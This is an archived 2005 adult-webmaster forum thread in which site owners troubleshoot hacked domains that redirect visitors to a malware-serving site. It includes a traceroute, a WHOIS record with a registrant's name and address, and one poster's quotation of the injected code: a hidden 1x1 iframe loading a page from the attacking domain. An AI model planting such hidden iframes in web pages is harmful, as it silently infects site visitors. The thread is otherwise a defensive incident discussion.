GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Help! Domain spoofing... (https://gfy.com/showthread.php?t=454953)

Dagwolf 04-12-2005 04:51 AM
Help! Domain spoofing...
 
I have a problem with a couple of domains. I lost contact with the host they were on and could no longer log in to ftp.

One of the domains, when I attempt to reach it, seems to load the correct page BUT with a virus! No virus on the other site's index page but it too has been obviously tampered with.

I pointed the domains to a new host and was shocked to find that they STILL load the same pages! With a little research I deduced that someone is "spoofing" my domains..

What I don't know is, how do I stop it?

megatgpdotnet 04-12-2005 04:53 AM
Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?

Dagwolf 04-12-2005 04:57 AM
Quote:
Originally Posted by megatgpdotnet
Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?
Both. Anyone attempting to access these domains is directed undetectably to a duplicate site which is neither on my old host nor on my new one. altered to suit someone else's purposes.

Dagwolf 04-12-2005 05:40 AM
Still stuck :(

Dagwolf 04-12-2005 05:46 AM
Might changing registrars help?

Boss Traffic Jim 04-12-2005 06:12 AM
Pretty much sounds near impossible, can you give the url's so we can investigate it for you? :2 cents:

Dagwolf 04-12-2005 06:21 AM
Quote:
Originally Posted by megatgpdotnet
Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?
Using a proxy server, I was able to reach the correct site.

Dagwolf 04-12-2005 06:22 AM
Quote:
Originally Posted by Afrin
Pretty much sounds near impossible, can you give the url's so we can investigate it for you? :2 cents:
I don't want to be responsible for the spread of a virus that appears to be coming from one of my websites...

Dagwolf 04-12-2005 06:25 AM
Does this help?

Quote:
Tracert to (mydomain).com
Generated by www.DNSstuff.com at 13:23:32 GMT on 12 Apr 2005.
Hop Time 1 Time 2 Time 3 IP Hostname Return TTL Country Time
1 2 ms 7 ms 6 ms 206.196.11.254 [www.DNSstuff.com 1st hop] 64 United States
2 3 ms 6 ms 5 ms 216.26.129.91 core-rtr02.ge-1-3-0.sdf.xodiax.net. 252 United States
3 68 ms 410 ms 27 ms 216.26.129.91 core-rtr02.ge-1-3-0.sdf.xodiax.net. 252 United States
4 10 ms 13 ms 12 ms 216.26.128.181 edge-rtr02.ge-0-3-0.sdf.xodiax.net. 252 United States
5 8 ms 17 ms 17 ms 65.117.168.137 chi-edge-09.inet.qwest.net. 251 United States Unix: 13:23:33.426
6 8 ms 14 ms 14 ms 205.171.20.121 chi-core-01.inet.qwest.net. 250 United States
7 8 ms 12 ms 11 ms 205.171.205.34 cer-core-01.inet.qwest.net. 249 United States
8 8 ms 20 ms 20 ms 205.171.139.146 chp-brdr-01.inet.qwest.net. 249 United States
9 8 ms 11 ms 11 ms 208.50.13.249 so3-1-1-622M.ar1.CHI2.gblx.net. 247 United States Unix: 13:23:33.642
10 72 ms 81 ms 90 ms 67.17.66.169 so1-0-0-2488M.ar2.TPA1.gblx.net. 245 United States
11 100 ms 108 ms 118 ms 64.215.80.66 ExpedientSago-NetworksDashboard-Communications.ge-2-0-0.ar2.TPA1.gblx.net. 55 United States
12 77 ms 99 ms 131 ms 65.110.32.8 gi0-1.ds01.tpa.sagonet.net. 245 United States Unix: 13:23:33.994
13 68 ms 77 ms 86 ms 63.246.157.19
[Reached Destination]unknown.sagonet.net. 53 United States

Dagwolf 04-12-2005 07:36 AM
Domain is redirecting to best-voyeur.info, which is the actual source of the virus (don't GO there unless
'you're a pro!)

It seems to be some sort of java applet/ infects the computer with iworm-bofra according to AVG.

Fake phone number, obviously..



Domain ID:D7816484-LRMS
Domain Name:BEST-VOYEUR.INFO
Created On:25-Oct-2004 14:39:24 UTC
Last Updated On:09-Dec-2004 13:08:11 UTC
Expiration Date:25-Oct-2005 14:39:24 UTC
Sponsoring Registrar:R136-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C7175719-LRMS
Registrant Name:Edward Lester
Registrant Street1:7338 Flamingo
Registrant City:Algonac
Registrant State/Province:MI
Registrant Postal Code:48001
Registrant Country:US
Registrant Phone:+1.10234567
Registrant *****************@yahoo.com

DirkPitt 07-13-2005 05:11 PM
I just noticed this exact thing happening to one of my domains. It's redirecting to the same place. best-voyeur.info. Like Dagwolf DON'T GO THERE!!! It's not a virus on the end user, to me it looks like somebody hacked into the server and made the modifications to the index.htm. I just uploaded a backup index and the problem went away. This post started 4/12 anybody know anything more?

4Pics 07-13-2005 05:12 PM
You might want to see what scripts you are running... if phpbb then it could be that.

DirkPitt 07-13-2005 05:18 PM
Quote:
Originally Posted by 4Pics
You might want to see what scripts you are running... if phpbb then it could be that.
The only script on the index is a banner js. I fixed the problem by just uploading a backup I had. That's why I think somebody got in there.

DirkPitt 07-13-2005 06:00 PM
This is what I found in my index file.

Code:
<div style="visibility:hidden"><iframe src=" http://best-voyeur.info/ggl/" width=1 height=1></iframe></div>

Quickdraw 07-13-2005 06:09 PM
These sites have that code as well(at least the few I checked)
http://www.google.com/search?hl=en&l...t-voyeur.info/


All times are GMT -7. The time now is 04:51 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123